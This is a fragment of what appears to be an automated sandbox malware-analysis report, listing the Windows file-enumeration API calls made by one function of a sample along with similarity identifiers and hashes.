                                • Part of subcall function 00DF4910: wsprintfA.USER32 ref: 00DF492C
                                • Part of subcall function 00DF4910: FindFirstFileA.KERNEL32(?,?), ref: 00DF4943
                                • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FDC), ref: 00DF4971
                                • Part of subcall function 00DF4910: StrCmpCA.SHLWAPI(?,00E00FE0), ref: 00DF4987
                                • Part of subcall function 00DF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00DF4B7D
                                • Part of subcall function 00DF4910: FindClose.KERNEL32(000000FF), ref: 00DF4B92
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                              • String ID:
                              • API String ID: 2667927680-0
                              • Opcode ID: 37bb4a1bbedef7642e9d99fe36edaee88e0e34a94c304446006d1c022e33e7bd
                              • Instruction ID: 4449cc0008ea4fe21374c391efa08b5fa422ba5b740b157a115c0b35c53724e8
                              • Opcode Fuzzy Hash: 37bb4a1bbedef7642e9d99fe36edaee88e0e34a94c304446006d1c022e33e7bd
                              • Instruction Fuzzy Hash: BD218B7AA00308ABC774FB60DC46EEE733CEB54300F108554F69997585DEB996C88BB1